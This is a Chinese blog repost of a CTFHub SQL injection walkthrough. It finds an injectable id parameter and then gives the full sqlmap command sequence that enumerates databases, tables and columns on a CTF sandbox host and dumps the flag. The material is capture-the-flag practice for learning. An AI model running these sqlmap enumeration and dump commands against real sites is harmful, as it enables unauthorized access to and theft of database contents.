首页 > 数据库 >CTFHUB-SQL注入-1

CTFHUB-SQL注入-1

时间:2024-07-25 15:26:18浏览次数:14  
标签:sqlmap http CTFHUB com SQL 1559e706c24187fa 10800 id 注入

对于sql注入类型的题,首先判断注入点

尝试发现注入点为?id=1'

发现联合注入无法回显,尝试使用sqlmap

先进行扫描

sqlmap -u "http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'"

 查询 dbs

sqlmap -u "http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'" -dbs

 查询note表

sqlmap -u "http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'" -D note -tables

查询fl4g

​

sqlmap -u "http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'" -D note -T fl4g -columns
​

查询fllllg

sqlmap -u "http://challenge-1559e706c24187fa.sandbox.ctfhub.com:10800/?id=1'" -D note -T fl4g -C fllllag -dump
​

 得出flag

标签:sqlmap,http,CTFHUB,com,SQL,1559e706c24187fa,10800,id,注入
From: https://blog.csdn.net/2301_79858466/article/details/140686720

相关文章

  • leetcode 1555 银行账号概要(postgresql)
    需求用户表:Users±-------------±--------+|ColumnName|Type|±-------------±--------+|user_id|int||user_name|varchar||credit|int|±-------------±--------+user_id是这个表的主键。表中的每一列包含每一个用户当前的额度信息。交易......
  • leetcode 1549 每件商品的最新订单(postgresql)
    需求表:Customers±--------------±--------+|ColumnName|Type|±--------------±--------+|customer_id|int||name|varchar|±--------------±--------+customer_id是该表主键.该表包含消费者的信息.表:Orders±--------------±--------+|......
  • SQLAlchemy CRUD 操作的多对多问题
    我已经处理SQLAlchemy中关联表的操作几天了,在创建person对象时遇到了问题。我正在尝试创建person对象。如果我将career_roles和genres字段保留为空列表,则该对象已成功创建。但是,如果我向这些字段添加整数值(主键),则会收到错误。crud操作asyncdefcreate(*,db_......
  • PostgreSQL学习笔记----GUC机制
    GUC介绍在守护进程Postmaster初始化内存环境之后,需要配置Postmaster运行时所需的各种参数。GUC(GrandUnifedConfiguralion)模块实现了多种数据类型(目前有boolean、int、real、string、enum五种)的变量配置。这些参数可能会由不同的进程在不同的时机进行配置,系统会根据......
  • Mysql 函数 (进阶介绍 八)
    目录MySQLCURTIME()函数定义和用法语法实例MySQLDATE()函数定义和用法语法实例MySQLEXTRACT()函数定义和用法语法实例MySQL字符串连接CONCAT()函数使用方法:MySQL字符串截取SUBSTRING()函数 使用方法:MySQL数学函数使用方法:mysqlsubstr()函数截......
  • JavaWeb项目中动态拼接sql语句
    业务需求描述:图中的查询框在分条件查询用户信息列表时,前端可能会传回一个条件或多个条件,此时要对不同的条件进行sql语句的不同书写,前端传的情况有很多种,所以如果分情况写sql语句会比较死,并且不够灵活,而且书写的内容会很多,所以要想一种办法来进行不同情况的sql语句拼接。参数......
  • gitlab12-postgresql-主备
    gitlab-postgresql-12.3一、简介1、gitlab仅支持postgresql数据库管理系统,因此,数据库服务器有两个选项可用于linux软件包安装:使用Linux软件包安装附带的打包PostgreSQL服务器(不需要配置,推荐)使用外部postgresql服务器,(需要配置,并且需要手动为数据库设定种子)2、本章节......
  • 一文了解MySQL索引机制
    接触MySQL数据库的小伙伴一定避不开索引,索引的出现是为了提高数据查询的效率,就像书的目录一样。某一个SQL查询比较慢,你第一时间想到的就是“给某个字段加个索引吧”,那么索引是什么?是如何工作的呢?一起静下心来,耐心看完这篇文章吧,干货不啰嗦,相信你一定会有所收获。一、索引模型模......
  • SQL Server 2019 中设置定时自动重启
    要在SQLServer2019中设置定时自动重启,可以使用Windows任务计划程序。下面是详细的步骤:步骤一:创建批处理文件打开记事本。输入以下内容:netstop"SQLServer(MSSQLSERVER)"netstart"SQLServer(MSSQLSERVER)"(如果使用的是命名实例,则需要将MSSQLSERVER替换为实......
  • Mysql中修改新创建用户的密码
    创建新用户时,新用户没有权限,所以自己无法修改成简单的密码(1)可以通过root用户给权限,让新用户自己修改:1.先进入root用户,mysql-uroot-p1234562.给新用户权限:grantallprivilegeson.to'新用户名'@'localhost'withgrantoption;(其中withgrantoption是让新用户......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99